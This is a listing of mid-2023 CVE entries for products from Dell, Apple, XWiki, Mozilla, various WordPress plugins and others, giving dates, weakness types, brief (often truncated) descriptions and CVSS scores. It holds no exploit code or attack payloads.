2023-06-23 CVE-2023-25937 Dell Improper Input Validation vulnerability in Dell products

Dell BIOS contains an improper input validation vulnerability.

6.7
2023-06-23 CVE-2023-28028 Dell Improper Input Validation vulnerability in Dell products

Dell BIOS contains an improper input validation vulnerability.

6.7
2023-06-23 CVE-2023-28029 Dell Improper Input Validation vulnerability in Dell products

Dell BIOS contains an improper input validation vulnerability.

6.7
2023-06-23 CVE-2023-28030 Dell Improper Input Validation vulnerability in Dell products

Dell BIOS contains an improper input validation vulnerability.

6.7
2023-06-23 CVE-2023-28032 Dell Improper Input Validation vulnerability in Dell products

Dell BIOS contains an improper input validation vulnerability.

6.7
2023-06-23 CVE-2023-28033 Dell Improper Input Validation vulnerability in Dell products

Dell BIOS contains an improper input validation vulnerability.

6.7
2023-06-23 CVE-2023-28035 Dell Improper Input Validation vulnerability in Dell products

Dell BIOS contains an improper input validation vulnerability.

6.7
2023-06-23 CVE-2023-28039 Dell Improper Input Validation vulnerability in Dell products

Dell BIOS contains an improper input validation vulnerability.

6.7
2023-06-23 CVE-2023-28040 Dell Improper Input Validation vulnerability in Dell products

Dell BIOS contains an improper input validation vulnerability.

6.7
2023-06-23 CVE-2023-28041 Dell Improper Input Validation vulnerability in Dell products

Dell BIOS contains an improper input validation vulnerability.

6.7
2023-06-23 CVE-2023-28042 Dell Improper Input Validation vulnerability in Dell products

Dell BIOS contains an improper input validation vulnerability.

6.7
2023-06-23 CVE-2023-28052 Dell Improper Input Validation vulnerability in Dell products

Dell BIOS contains an improper input validation vulnerability.

6.7
2023-06-23 CVE-2023-28054 Dell Improper Input Validation vulnerability in Dell products

Dell BIOS contains an improper input validation vulnerability.

6.7
2023-06-23 CVE-2023-28056 Dell Improper Input Validation vulnerability in Dell products

Dell BIOS contains an improper input validation vulnerability.

6.7
2023-06-23 CVE-2023-28059 Dell Improper Input Validation vulnerability in Dell products

Dell BIOS contains an improper input validation vulnerability.

6.7
2023-06-23 CVE-2023-28061 Dell Improper Input Validation vulnerability in Dell products

Dell BIOS contains an improper input validation vulnerability.

6.7
2023-06-23 CVE-2023-25936 Dell Improper Input Validation vulnerability in Dell products

Dell BIOS contains an improper input validation vulnerability.

6.7
2023-06-25 CVE-2023-3396 Retro Cellphone Online Store Project SQL Injection vulnerability in Retro Cellphone Online Store Project Retro Cellphone Online Store 1.0

A vulnerability was found in Campcodes Retro Cellphone Online Store 1.0.

6.5
2023-06-23 CVE-2023-35154 ENG Improper Authentication vulnerability in ENG Knowage

Knowage is an open source analytics and business intelligence suite.

6.5
2023-06-23 CVE-2023-35173 Nextcloud Unspecified vulnerability in Nextcloud End-To-End Encryption

Nextcloud End-to-end encryption app provides all the necessary APIs to implement End-to-End encryption on the client side.

6.5
2023-06-23 CVE-2023-34673 Elenos Unspecified vulnerability in Elenos Etg150 Firmware 3.12

Elenos ETG150 FM transmitter running on version 3.12 was discovered to be leaking SMTP credentials and other sensitive information by exploiting the publicly accessible Memcached service.

6.5
2023-06-23 CVE-2023-28204 Apple Out-of-bounds Read vulnerability in Apple products

An out-of-bounds read was addressed with improved input validation.

6.5
2023-06-23 CVE-2023-32402 Apple Out-of-bounds Read vulnerability in Apple products

An out-of-bounds read was addressed with improved input validation.

6.5
2023-06-23 CVE-2023-32423 Apple Classic Buffer Overflow vulnerability in Apple products

A buffer overflow issue was addressed with improved memory handling.

6.5
2023-06-23 CVE-2023-23344 Hcltech Incorrect Default Permissions vulnerability in Hcltech Bigfix Webui Insights 14

A permission issue in BigFix WebUI Insights site version 14 allows an authenticated, unprivileged operator to access an administrator page.

6.5
2023-06-22 CVE-2023-34462 Netty Resource Exhaustion vulnerability in Netty

Netty is an asynchronous event-driven network application framework for rapid development of maintainable high performance protocol servers & clients.

6.5
2023-06-22 CVE-2023-34553 Wafucn Authentication Bypass by Capture-replay vulnerability in Wafucn Wafu Keyless Smart Lock Firmware 1.0

An issue was discovered in WAFU Keyless Smart Lock v1.0 allows attackers to unlock a device via code replay attack.

6.5
2023-06-22 CVE-2022-47593 Rapidload SQL Injection vulnerability in Rapidload Power-Up for Autoptimize

Auth.

6.5
2023-06-22 CVE-2023-25499 Vaadin Information Exposure vulnerability in Vaadin

When adding non-visible components to the UI in server side, content is sent to the browser in Vaadin 10.0.0 through 10.0.22, 11.0.0 through 14.10.0, 15.0.0 through 22.0.28, 23.0.0 through 23.3.12, 24.0.0 through 24.0.5 and 24.1.0.alpha1 to 24.1.0.beta1, resulting in potential information disclosure.

6.5
2023-06-22 CVE-2023-34927 Casbin Cross-Site Request Forgery (CSRF) vulnerability in Casbin Casdoor

Casdoor v1.331.0 and below was discovered to contain a Cross-Site Request Forgery (CSRF) in the endpoint /api/set-password.

6.5
2023-06-22 CVE-2023-35093 Stylemixthemes Missing Authorization vulnerability in Stylemixthemes Masterstudy LMS

Broken Access Control vulnerability in StylemixThemes MasterStudy LMS WordPress Plugin – for Online Courses and Education plugin <= 3.0.8 versions allows any logged-in users, such as subscribers to view the "Orders" of the plugin and get the data related to the order like email, username, and more.

6.5
2023-06-20 CVE-2020-20502 Yzmcms Cross-Site Request Forgery (CSRF) vulnerability in Yzmcms 2.0

Cross Site Request Forgery found in yzCMS v.2.0 allows a remote attacker to execute arbitrary code via the token check function.

6.5
2023-06-20 CVE-2023-34596 Aeotech Unspecified vulnerability in Aeotech Zw130-A Firmware 2.3

A vulnerability in Aeotec WallMote Switch firmware v2.3 allows attackers to cause a Denial of Service (DoS) via a crafted Z-Wave message.

6.5
2023-06-20 CVE-2023-34597 Fibaro Unspecified vulnerability in Fibaro Fgms-001 Firmware 3.4

A vulnerability in Fibaro Motion Sensor firmware v3.4 allows attackers to cause a Denial of Service (DoS) via a crafted Z-Wave message.

6.5
2023-06-20 CVE-2023-26428 Open Xchange Authorization Bypass Through User-Controlled Key vulnerability in Open-Xchange Appsuite Backend

Attackers can successfully request arbitrary snippet IDs, including E-Mail signatures of other users within the same context.

6.5
2023-06-19 CVE-2023-3316 Libtiff NULL Pointer Dereference vulnerability in Libtiff

A NULL pointer dereference in TIFFClose() is caused by a failure to open an output file (non-existent path or a path that requires permissions like /dev/null) while specifying zones.

6.5
2023-06-19 CVE-2023-29545 Mozilla Unspecified vulnerability in Mozilla Thunderbird

Similar to CVE-2023-28163, this time when choosing 'Save Link As', suggested filenames containing environment variable names would have resolved those in the context of the current user.

6.5
2023-06-19 CVE-2023-29546 Mozilla Unspecified vulnerability in Mozilla Firefox and Firefox Focus

When recording the screen while in Private Browsing on Firefox for Android the address bar and keyboard were not hidden, potentially leaking sensitive information.

6.5
2023-06-19 CVE-2023-32210 Mozilla Unspecified vulnerability in Mozilla Firefox

Documents were incorrectly assuming an ordering of principal objects when ensuring we were loading an appropriately privileged principal.

6.5
2023-06-19 CVE-2023-35005 Apache Unspecified vulnerability in Apache Airflow 2.6.0

In Apache Airflow, some potentially sensitive values were being shown to the user in certain situations. This vulnerability is mitigated by the fact configuration is not shown in the UI by default (only if `[webserver] expose_config` is set to `non-sensitive-only`), and not all uncensored values are actually sentitive. This issue affects Apache Airflow: from 2.5.0 before 2.6.2.

6.5
2023-06-19 CVE-2023-35862 Libcoap Out-of-bounds Read vulnerability in Libcoap 4.3.1

libcoap 4.3.1 contains a buffer over-read via the function coap_parse_oscore_conf_mem at coap_oscore.c.

6.5
2023-06-19 CVE-2023-35840 Std42 Path Traversal vulnerability in Std42 Elfinder

_joinPath in elFinderVolumeLocalFileSystem.class.php in elFinder before 2.1.62 allows path traversal in the PHP LocalVolumeDriver connector.

6.5
2023-06-23 CVE-2023-35167 Remult Improper Access Control vulnerability in Remult

Remult is a CRUD framework for full-stack TypeScript.

6.3
2023-06-23 CVE-2023-27940 Apple Unspecified vulnerability in Apple Ipados, Iphone OS and Macos

The issue was addressed with additional permissions checks.

6.3
2023-06-23 CVE-2023-32371 Apple Unspecified vulnerability in Apple Iphone OS and Macos

The issue was addressed with improved checks.

6.3
2023-06-22 CVE-2023-35132 Moodle SQL Injection vulnerability in Moodle

A limited SQL injection risk was identified on the Mnet SSO access control page.

6.3
2023-06-25 CVE-2023-36666 Inex Cross-site Scripting vulnerability in Inex IXP Manager

INEX IXP-Manager before 6.3.1 allows XSS.

6.1
2023-06-24 CVE-2023-3388 Beautiful Cookie Banner Cross-site Scripting vulnerability in Beautiful-Cookie-Banner Beautiful Cookie Consent Banner

The Beautiful Cookie Consent Banner for WordPress is vulnerable to Stored Cross-Site Scripting via the 'nsc_bar_content_href' parameter in versions up to, and including, 2.10.1 due to insufficient input sanitization and output escaping.

6.1
2023-06-23 CVE-2023-35171 Nextcloud Open Redirect vulnerability in Nextcloud Server 26.0.0

NextCloud Server and NextCloud Enterprise Server provide file storage for Nextcloud, a self-hosted productivity platform.

6.1
2023-06-23 CVE-2023-35759 Progress Cross-site Scripting vulnerability in Progress Whatsup Gold 22.1.0

In Progress WhatsUp Gold before 23.0.0, an SNMP-related application endpoint failed to adequately sanitize malicious input.

6.1
2023-06-23 CVE-2023-36346 Codekop Cross-site Scripting vulnerability in Codekop 2.0

POS Codekop v2.0 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via the nm_member parameter at print.php.

6.1
2023-06-23 CVE-2023-35155 Xwiki Cross-site Scripting vulnerability in Xwiki

XWiki Platform is a generic wiki platform offering runtime services for applications built on top of it.

6.1
2023-06-23 CVE-2023-35156 Xwiki Cross-site Scripting vulnerability in Xwiki

XWiki Platform is a generic wiki platform offering runtime services for applications built on top of it.

6.1
2023-06-23 CVE-2023-35158 Xwiki Improper Neutralization of Alternate XSS Syntax vulnerability in Xwiki

XWiki Platform is a generic wiki platform offering runtime services for applications built on top of it.

6.1
2023-06-23 CVE-2023-35159 Xwiki Cross-site Scripting vulnerability in Xwiki

XWiki Platform is a generic wiki platform offering runtime services for applications built on top of it.

6.1
2023-06-23 CVE-2023-35160 Xwiki Cross-site Scripting vulnerability in Xwiki

XWiki Platform is a generic wiki platform offering runtime services for applications built on top of it.

6.1
2023-06-23 CVE-2023-35161 Xwiki Cross-site Scripting vulnerability in Xwiki

XWiki Platform is a generic wiki platform offering runtime services for applications built on top of it.

6.1
2023-06-23 CVE-2023-35162 Xwiki Cross-site Scripting vulnerability in Xwiki

XWiki Platform is a generic wiki platform offering runtime services for applications built on top of it.

6.1
2023-06-23 CVE-2023-36287 Webkul Cross-site Scripting vulnerability in Webkul Qloapps 1.6.0

An unauthenticated Cross-Site Scripting (XSS) vulnerability found in Webkul QloApps 1.6.0 allows an attacker to obtain a user's session cookie and then impersonate that user via POST controller parameter.

6.1
2023-06-23 CVE-2023-36289 Webkul Cross-site Scripting vulnerability in Webkul Qloapps 1.6.0

An unauthenticated Cross-Site Scripting (XSS) vulnerability found in Webkul QloApps 1.6.0 allows an attacker to obtain a user's session cookie and then impersonate that user via POST email_create and back parameter.

6.1
2023-06-23 CVE-2023-29100 Dream Theme Cross-site Scripting vulnerability in Dream-Theme The7

Unauth.

6.1
2023-06-23 CVE-2023-34012 Leap13 Cross-site Scripting vulnerability in Leap13 Premium Addons for Elementor

Unauth.

6.1
2023-06-23 CVE-2023-34021 Church Admin Project Cross-site Scripting vulnerability in Church Admin Project Church Admin

Unauth.

6.1
2023-06-23 CVE-2023-3381 Online School Fees System Project Cross-site Scripting vulnerability in Online School Fees System Project Online School Fees System 1.0

A vulnerability classified as problematic was found in SourceCodester Online School Fees System 1.0.

6.1
2023-06-23 CVE-2023-3382 Game Result Matrix System Project Cross-site Scripting vulnerability in Game Result Matrix System Project Game Result Matrix System 1.0

A vulnerability, which was classified as problematic, has been found in SourceCodester Game Result Matrix System 1.0.

6.1
2023-06-22 CVE-2023-28016 Hcltech Injection vulnerability in Hcltech Bigfix OSD Bare Metal Server

Host Header Injection vulnerability in the HCL BigFix OSD Bare Metal Server version 311.12 or lower allows attacker to supply invalid input to cause the OSD Bare Metal Server to perform a redirect to an attacker-controlled domain.

6.1
2023-06-22 CVE-2023-23343 Hcltech Improper Restriction of Rendered UI Layers or Frames vulnerability in Hcltech Bigfix OSD Bare Metal Server

A clickjacking vulnerability in the HCL BigFix OSD Bare Metal Server version 311.12 or lower allows attacker to use transparent or opaque layers to trick a user into clicking on a button or link on another page to perform a redirect to an attacker-controlled domain.

6.1
2023-06-22 CVE-2023-35131 Moodle Cross-site Scripting vulnerability in Moodle

Content on the groups page required additional sanitizing to prevent an XSS risk.

6.1
2023-06-22 CVE-2023-28799 Zscaler Open Redirect vulnerability in Zscaler Client Connector

A URL parameter during login flow was vulnerable to injection.

6.1
2023-06-22 CVE-2023-28800 Zscaler Cross-site Scripting vulnerability in Zscaler Client Connector

When using local accounts for administration, the redirect url parameter was not encoded correctly, allowing for an XSS attack providing admin login.

6.1
2023-06-22 CVE-2023-34796 Techsneeze Cross-site Scripting vulnerability in Techsneeze Dmarc Report 1.1

Cross site scripting (XSS) vulnerabiliy in dmarcts-report-viewer dashboard versions 1.1 and thru commit 8a1d882b4c481a05e296e9b38a7961e912146a0f, allows unauthenticated attackers to execute arbitrary code via the org_name or domain values.

6.1
2023-06-22 CVE-2023-32960 Updraftplus Cross-Site Request Forgery (CSRF) vulnerability in Updraftplus

Cross-Site Request Forgery (CSRF) vulnerability in UpdraftPlus.Com, DavidAnderson UpdraftPlus WordPress Backup Plugin <= 1.23.3 versions leads to sitewide Cross-Site Scripting (XSS).

6.1
2023-06-22 CVE-2023-33997 BBP Style Pack Project Cross-site Scripting vulnerability in BBP Style Pack Project BBP Style Pack

Unauth.

6.1
2023-06-22 CVE-2023-28750 Albo Pretorio ON Line Project Cross-site Scripting vulnerability in Albo Pretorio on Line Project Albo Pretorio on Line

Unauth.

6.1
2023-06-22 CVE-2023-28776 I13Websolution Cross-site Scripting vulnerability in I13Websolution Continuous Image Carousel With Lightbox

Unauth.

6.1
2023-06-22 CVE-2023-28784 Contest Gallery Cross-site Scripting vulnerability in Contest-Gallery Contest Gallery

Unauth.

6.1
2023-06-22 CVE-2023-30500 Wpforms Cross-site Scripting vulnerability in Wpforms Contact Form and Wpforms

Unauth.

6.1
2023-06-22 CVE-2023-35918 Woocommerce Cross-site Scripting vulnerability in Woocommerce Bulk Stock Management

Unauth.

6.1
2023-06-22 CVE-2023-33387 Datev Cross-site Scripting vulnerability in Datev EG Personal-Management System Comfort/Comfort Plus 16.1.1

A reflected cross-site scripting (XSS) vulnerability in DATEV eG Personal-Management System Comfort/Comfort Plus v15.1.0 to v16.1.1 P4 allows attackers to steal targeted users' login data by sending a crafted link.

6.1
2023-06-22 CVE-2023-28166 Tags Cloud Manager Project Cross-site Scripting vulnerability in Tags Cloud Manager Project Tags Cloud Manager

Unauth.

6.1
2023-06-22 CVE-2019-25152 Tychesoftwares Unspecified vulnerability in Tychesoftwares products

The Abandoned Cart Lite for WooCommerce and Abandoned Cart Pro for WooCommerce plugins for WordPress are vulnerable to Stored Cross-Site Scripting via multiple parameters in versions up to, and including, 5.1.3 and 7.12.0 respectively, due to insufficient input sanitization and output escaping.

6.1
2023-06-21 CVE-2023-33405 Blogengine Open Redirect vulnerability in Blogengine Blogengine.Net

Blogengine.net 3.3.8.0 and earlier is vulnerable to Open Redirect.

6.1
2023-06-21 CVE-2023-33591 User Registration Login AND User Management System Project Cross-site Scripting vulnerability in User Registration & Login and User Management System Project User Registration & Login and User Management System 1.0

User Registration & Login and User Management System v1.0 was discovered to contain a cross-site scripting (XSS) vulnerability via the component /admin/search-result.php.

6.1
2023-06-21 CVE-2023-33725 Broadleafcommerce Cross-site Scripting vulnerability in Broadleafcommerce Broadleaf Commerce

Broadleaf 5.x and 6.x (including 5.2.25-GA and 6.2.6-GA) was discovered to contain a cross-site scripting (XSS) vulnerability via a customer signup with a crafted email address.

6.1
2023-06-21 CVE-2023-27414 AYS PRO Cross-site Scripting vulnerability in Ays-Pro Popup BOX

Unauth.

6.1
2023-06-21 CVE-2023-27432 Manage Upload Limit Project Cross-site Scripting vulnerability in Manage Upload Limit Project Manage Upload Limit

Unauth.

6.1
2023-06-21 CVE-2023-27450 TE ST Cross-site Scripting vulnerability in Te-St Leyka

Unauth.

6.1
2023-06-20 CVE-2020-20070 Diaowen Cross-site Scripting vulnerability in Diaowen Dwsurvey 1.0

Cross Site Scripting vulnerability found in wkeyuan DWSurvey 1.0 allows a remote attacker to execute arbitrary code via thequltemld parameter of the qu-multi-fillblank!answers.action file.

6.1
2023-06-20 CVE-2020-20725 Taogogo Cross-site Scripting vulnerability in Taogogo Taocms 2.5

Cross Site Scripting vulnerability in taogogo taoCMS v.2.5 beta5.1 allows remote attacker to execute arbitrary code via the name field in admin.php.

6.1
2023-06-20 CVE-2020-21052 Zrlog Cross-site Scripting vulnerability in Zrlog 2.1.3

Cross Site Scripting vulnerability in zrlog zrlog v.2.1.3 allows a remote attacker to execute arbitrary code via the nickame parameter of the /post/addComment function.

6.1
2023-06-20 CVE-2020-21058 Typora Cross-site Scripting vulnerability in Typora 0.9.79

Cross Site Scripting vulnerability in Typora v.0.9.79 allows a remote attacker to execute arbitrary code via the mermaid sytax.

6.1
2023-06-20 CVE-2020-21268 Easycorp Cross-site Scripting vulnerability in Easycorp Zentao 11.6.4

Cross Site Scripting vulnerability in EasySoft ZenTao v.11.6.4 allows a remote attacker to execute arbitrary code via the lastComment parameter.

6.1
2023-06-20 CVE-2020-21485 Alluxio Cross-site Scripting vulnerability in Alluxio 1.8.1

Cross Site Scripting vulnerability in Alluxio v.1.8.1 allows a remote attacker to executea arbitrary code via the path parameter in the browse board component.

6.1
2023-06-20 CVE-2023-33495 Craftcms Cross-site Scripting vulnerability in Craftcms Craft CMS

Craft CMS through 4.4.9 is vulnerable to HTML Injection.

6.1
2023-06-20 CVE-2023-35097 Dojo Cross-site Scripting vulnerability in Dojo WP Affiliate Links

Unauth.

6.1
2023-06-20 CVE-2023-35098 Wordpress Nextgen Galleryview Project Cross-site Scripting vulnerability in Wordpress Nextgen Galleryview Project Wordpress Nextgen Galleryview

Unauth.

6.1
2023-06-20 CVE-2023-35884 Metagauss Cross-site Scripting vulnerability in Metagauss Eventprime

Unauth.

6.1
2023-06-19 CVE-2023-32659 Subnet Cross-site Scripting vulnerability in Subnet Powersystem Center 2020

SUBNET PowerSYSTEM Center versions 2020 U10 and prior contain a cross-site scripting vulnerability that may allow an attacker to inject malicious code into report header graphic files that could propagate out of the system and reach users who are subscribed to email notifications.

6.1
2023-06-19 CVE-2023-35772 Google MAP Shortcode Project Cross-site Scripting vulnerability in Google MAP Shortcode Project Google MAP Shortcode

Unauth.

6.1
2023-06-19 CVE-2023-35775 WP Backup Solutions Project Cross-site Scripting vulnerability in WP Backup Solutions Project WP Backup Solutions

Unauth.

6.1
2023-06-19 CVE-2023-2399 Qudata Unspecified vulnerability in Qudata Qubot

The QuBot WordPress plugin before 1.1.6 doesn't filter user input on chat, leading to bad code inserted on it be reflected on the user dashboard.

6.1
2023-06-19 CVE-2023-2654 Themify Unspecified vulnerability in Themify Conditional Menus

The Conditional Menus WordPress plugin before 1.2.1 does not escape a parameter before outputting it back in an attribute, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin

6.1
2023-06-19 CVE-2023-2779 Heator Unspecified vulnerability in Heator Social Share, Social Login and Social Comments

The Social Share, Social Login and Social Comments WordPress plugin before 7.13.52 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin.

6.1
2023-06-19 CVE-2023-34415 Mozilla Open Redirect vulnerability in Mozilla Firefox

When choosing a site-isolated process for a document loaded from a data: URL that was the result of a redirect, Firefox would load that document in the same process as the site that issued the redirect.

6.1
2023-06-23 CVE-2023-32369 Apple Unspecified vulnerability in Apple Macos

A logic issue was addressed with improved state management.

6.0
2023-06-25 CVE-2015-20109 GNU Classic Buffer Overflow vulnerability in GNU Glibc

end_pattern (called from internal_fnmatch) in the GNU C Library (aka glibc or libc6) before 2.22 might allow context-dependent attackers to cause a denial of service (application crash), as demonstrated by use of the fnmatch library function with the **(!() pattern.

5.5
2023-06-23 CVE-2022-42792 Apple Unspecified vulnerability in Apple Ipados and Iphone OS

This issue was addressed with improved data protection.

5.5
2023-06-23 CVE-2022-42860 Apple Unspecified vulnerability in Apple Macos

This issue was addressed with improved checks to prevent unauthorized actions.

5.5
2023-06-23 CVE-2022-46715 Apple Unspecified vulnerability in Apple Ipados and Iphone OS

A logic issue was addressed with improved checks.

5.5
2023-06-23 CVE-2022-46718 Apple Unspecified vulnerability in Apple Ipados and Macos

A logic issue was addressed with improved restrictions.

5.5
2023-06-23 CVE-2023-25520 Nvidia Improper Input Validation vulnerability in Nvidia Jetson Linux

NVIDIA Jetson Linux Driver Package contains a vulnerability in nvbootctrl, where a privileged local attacker can configure invalid settings, resulting in denial of service.

5.5
2023-06-23 CVE-2023-28191 Apple Unspecified vulnerability in Apple products

This issue was addressed with improved redaction of sensitive information.

5.5
2023-06-23 CVE-2023-28202 Apple Unspecified vulnerability in Apple products

This issue was addressed with improved state management.

5.5
2023-06-23 CVE-2023-32352 Apple Unspecified vulnerability in Apple products

A logic issue was addressed with improved checks.

5.5
2023-06-23 CVE-2023-32354 Apple Out-of-bounds Read vulnerability in Apple products

An out-of-bounds read was addressed with improved input validation.

5.5
2023-06-23 CVE-2023-32355 Apple Unspecified vulnerability in Apple Macos

A logic issue was addressed with improved state management.

5.5
2023-06-23 CVE-2023-32360 Apple Unspecified vulnerability in Apple Macos

An authentication issue was addressed with improved state management.

5.5
2023-06-23 CVE-2023-32363 Apple Unspecified vulnerability in Apple Macos

A permissions issue was addressed by removing vulnerable code and adding additional checks.

5.5
2023-06-23 CVE-2023-32367 Apple Unspecified vulnerability in Apple Iphone OS and Macos

This issue was addressed with improved entitlements.

5.5
2023-06-23 CVE-2023-32368 Apple Out-of-bounds Read vulnerability in Apple products

An out-of-bounds read was addressed with improved input validation.

5.5
2023-06-23 CVE-2023-32372 Apple Out-of-bounds Read vulnerability in Apple products

An out-of-bounds read was addressed with improved input validation.

5.5
2023-06-23 CVE-2023-32375 Apple Out-of-bounds Read vulnerability in Apple Macos

An out-of-bounds read was addressed with improved input validation.

5.5
2023-06-23 CVE-2023-32376 Apple Unspecified vulnerability in Apple products

This issue was addressed with improved entitlements.

5.5
2023-06-23 CVE-2023-32382 Apple Out-of-bounds Read vulnerability in Apple Macos

An out-of-bounds read was addressed with improved input validation.

5.5
2023-06-23 CVE-2023-32385 Apple Unspecified vulnerability in Apple Macos

A denial-of-service issue was addressed with improved memory handling.

5.5
2023-06-23 CVE-2023-32388 Apple Unspecified vulnerability in Apple products

A privacy issue was addressed with improved private data redaction for log entries.

5.5
2023-06-23 CVE-2023-32389 Apple Unspecified vulnerability in Apple products

This issue was addressed with improved redaction of sensitive information.

5.5
2023-06-23 CVE-2023-32392 Apple Information Exposure Through Log Files vulnerability in Apple products

A privacy issue was addressed with improved private data redaction for log entries.

5.5
2023-06-23 CVE-2023-32395 Apple Unspecified vulnerability in Apple Macos

A logic issue was addressed with improved state management.

5.5
2023-06-23 CVE-2023-32399 Apple Unspecified vulnerability in Apple products

The issue was addressed with improved handling of caches.

5.5
2023-06-23 CVE-2023-32400 Apple Unspecified vulnerability in Apple products

This issue was addressed with improved checks.

5.5
2023-06-23 CVE-2023-32403 Apple Unspecified vulnerability in Apple products

This issue was addressed with improved redaction of sensitive information.

5.5
2023-06-23 CVE-2023-32404 Apple Unspecified vulnerability in Apple products

This issue was addressed with improved entitlements.

5.5
2023-06-23 CVE-2023-32407 Apple Unspecified vulnerability in Apple products

A logic issue was addressed with improved state management.

5.5
2023-06-23 CVE-2023-32408 Apple Unspecified vulnerability in Apple products

The issue was addressed with improved handling of caches.

5.5
2023-06-23 CVE-2023-32410 Apple Out-of-bounds Read vulnerability in Apple Ipados and Macos

An out-of-bounds read was addressed with improved input validation.

5.5
2023-06-23 CVE-2023-32411 Apple Unspecified vulnerability in Apple products

This issue was addressed with improved entitlements.

5.5
2023-06-23 CVE-2023-32415 Apple Unspecified vulnerability in Apple products

This issue was addressed with improved redaction of sensitive information.

5.5
2023-06-23 CVE-2023-32422 Apple Unspecified vulnerability in Apple products

This issue was addressed by adding additional SQLite logging restrictions.

5.5
2023-06-23 CVE-2023-35925 Intellectualsites Resource Exhaustion vulnerability in Intellectualsites Fastasyncworldedit

FastAsyncWorldEdit (FAWE) is designed for efficient world editing.

5.5
2023-06-22 CVE-2023-33842 IBM Unspecified vulnerability in IBM Spss Modeler

IBM SPSS Modeler on Windows 17.0, 18.0, 18.2.2, 18.3, 18.4, and 18.5 requires the end user to have access to the server SSL key which could allow a local user to decrypt and obtain sensitive information.

5.5
2023-06-21 CVE-2023-25435 Libtiff Classic Buffer Overflow vulnerability in Libtiff 4.5.0

libtiff 4.5.0 is vulnerable to Buffer Overflow via extractContigSamplesShifted8bits() at /libtiff/tools/tiffcrop.c:3753.

5.5
2023-06-20 CVE-2023-3220 Linux NULL Pointer Dereference vulnerability in Linux Kernel

An issue was discovered in the Linux kernel through 6.1-rc8.

5.5
2023-06-19 CVE-2023-3022 Linux Type Confusion vulnerability in Linux Kernel

A flaw was found in the IPv6 module of the Linux kernel.

5.5
2023-06-19 CVE-2023-29532 Mozilla Unspecified vulnerability in Mozilla Firefox

A local attacker can trick the Mozilla Maintenance Service into applying an unsigned update file by pointing the service at an update file on a malicious SMB server.

5.5
2023-06-19 CVE-2023-35866 Keepassxc Unspecified vulnerability in Keepassxc

In KeePassXC through 2.7.5, a local attacker can make changes to the Database security settings, including master password and second-factor authentication, within an authenticated KeePassXC Database session, without the need to authenticate these changes by entering the password and/or second-factor authentication to confirm changes.

5.5
2023-06-24 CVE-2023-3387 Lanacodes Unspecified vulnerability in Lanacodes Lana Text to Image 1.0.0

The Lana Text to Image plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'lana_text_to_image' and 'lana_text_to_img' shortcode in versions up to, and including, 1.0.0 due to insufficient input sanitization and output escaping on user supplied attributes.

5.4
2023-06-24 CVE-2023-1724 Ladybirdweb Cross-site Scripting vulnerability in Ladybirdweb Faveo Helpdesk

Faveo Helpdesk Enterprise version 6.0.1 allows an attacker with agent permissions to perform privilege escalation on the application.

5.4
2023-06-23 CVE-2023-3394 Fossbilling Session Fixation vulnerability in Fossbilling

Session Fixation in GitHub repository fossbilling/fossbilling prior to 0.5.1.

5.4
2023-06-23 CVE-2023-27964 Apple Authentication Bypass by Spoofing vulnerability in Apple Airpods Firmware 5E133

An authentication issue was addressed with improved state management.

5.4
2023-06-23 CVE-2023-35153 Xwiki Cross-site Scripting vulnerability in Xwiki

XWiki Platform is a generic wiki platform.

5.4
2023-06-23 CVE-2023-34464 Xwiki Cross-site Scripting vulnerability in Xwiki

XWiki Platform is a generic wiki platform offering runtime services for applications built on top of it.

5.4
2023-06-23 CVE-2023-36288 Webkul Cross-site Scripting vulnerability in Webkul Qloapps 1.6.0

An unauthenticated Cross-Site Scripting (XSS) vulnerability found in Webkul QloApps 1.6.0 allows an attacker to obtain a user's session cookie and then impersonate that user via GET configure parameter.

5.4
2023-06-23 CVE-2023-3304 Admidio Unspecified vulnerability in Admidio

Improper Access Control in GitHub repository admidio/admidio prior to 4.2.9.

5.4
2023-06-22 CVE-2023-36093 Eyoucms Cross-site Scripting vulnerability in Eyoucms 1.6.3

There is a storage type cross site scripting (XSS) vulnerability in the filing number of the Basic Information tab on the backend management page of EyouCMS v1.6.3

5.4
2023-06-22 CVE-2023-28418 Mediciti Lite Project Cross-site Scripting vulnerability in Mediciti Lite Project Mediciti Lite

Auth.

5.4
2023-06-22 CVE-2023-32239 Xtemos Cross-site Scripting vulnerability in Xtemos Woodmart Theme

Auth.

5.4
2023-06-22 CVE-2023-31868 Sage Cross-site Scripting vulnerability in Sage X3 12.14.0.500

Sage X3 version 12.14.0.50-0 is vulnerable to Cross Site Scripting (XSS).

5.4
2023-06-22 CVE-2023-31213 Wpbakery Cross-site Scripting vulnerability in Wpbakery Page Builder

Auth.

5.4
2023-06-22 CVE-2023-35090 Stylemixthemes Cross-site Scripting vulnerability in Stylemixthemes Masterstudy LMS

Auth.

5.4
2023-06-22 CVE-2023-28171 Wpchill Cross-site Scripting vulnerability in Wpchill Brilliance

Auth.

5.4
2023-06-22 CVE-2023-28534 Wpjobportal Cross-site Scripting vulnerability in Wpjobportal WP JOB Portal

Auth.

5.4
2023-06-22 CVE-2023-27413 W4 Post List Project Cross-site Scripting vulnerability in W4 Post List Project W4 Post List

Auth.

5.4
2023-06-22 CVE-2023-27612 Geminilabs Cross-site Scripting vulnerability in Geminilabs Site Reviews

Auth.

5.4
2023-06-22 CVE-2023-27629 Geminilabs Cross-site Scripting vulnerability in Geminilabs Site Reviews

Auth.

5.4
2023-06-22 CVE-2023-27631 Daily Prayer Time Project Cross-site Scripting vulnerability in Daily Prayer Time Project Daily Prayer Time

Auth.

5.4
2023-06-21 CVE-2023-27443 Simple Vimeo Shortcode Project Cross-site Scripting vulnerability in Simple Vimeo Shortcode Project Simple Vimeo Shortcode

Auth.

5.4
2023-06-20 CVE-2020-21246 Yiicms Project Cross-site Scripting vulnerability in Yiicms Project Yiicms 1.0

Cross Site Scripting vulnerability in YiiCMS v.1.0 allows a remote attacker to execute arbitrary code via the news function.

5.4
2023-06-20 CVE-2023-35882 Heateor Cross-site Scripting vulnerability in Heateor Super Socializer

Auth.

5.4
2023-06-19 CVE-2023-34461 Pybb Project Cross-site Scripting vulnerability in Pybb Project Pybb 0.1.0

PyBB is an open source bulletin board.

5.4
2023-06-19 CVE-2023-35776 Bearsthemes Cross-site Scripting vulnerability in Bearsthemes Sermons Online

Auth.

5.4
2023-06-19 CVE-2023-3318 Resort Management System Project Cross-site Scripting vulnerability in Resort Management System Project Resort Management System 1.0

A vulnerability was found in SourceCodester Resort Management System 1.0.

5.4
